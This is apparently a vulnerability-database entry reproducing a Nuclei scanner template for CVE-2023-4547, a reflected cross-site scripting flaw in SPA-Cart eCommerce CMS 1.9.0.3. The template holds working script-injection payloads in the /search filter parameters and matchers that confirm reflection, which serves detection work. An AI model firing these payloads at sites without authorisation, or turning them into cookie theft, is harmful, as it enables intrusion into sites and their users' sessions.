Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-4547
HistoryOct 17, 2023 - 7:20 a.m.

SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
5
vulnerability
spa-cart
ecommerce cms
cross-site scripting
remote
unauthenticated
cve-2023-4547

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

65.2%

A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
id: CVE-2023-4547

info:
  name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
  author: theamanrawat,SoSpiRo
  severity: medium
  description: |
    A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
  reference:
    - https://spa-cart.com
    - https://cxsecurity.com/ascii/WLB-2023080090
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4547
    - https://vuldb.com/?ctiid.238058
    - https://vuldb.com/?id.238058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4547
    cwe-id: CWE-79
    epss-score: 0.0025
    epss-percentile: 0.6492
    cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: spa-cart
    product: ecommerce_cms
  tags: cve,cve2023,spa-cart,unauth,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
      - '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '100-1331"><script>alert(document.cookie)</script>'
          - '><script>alert(document.cookie)</script>bvu51'
        condition: or

      - type: word
        part: body
        words:
          - '<table class="products-nav">'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a00463044022029cda6ad135bffafeee5ebf0105becd915cfd86c8f9c3d8f7e80614706e35e3c02207ac440100d7b051e5d940d8a47729ba666c07b91ea0048467fcd5bc5b054a142:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

65.2%

Related for NUCLEI:CVE-2023-4547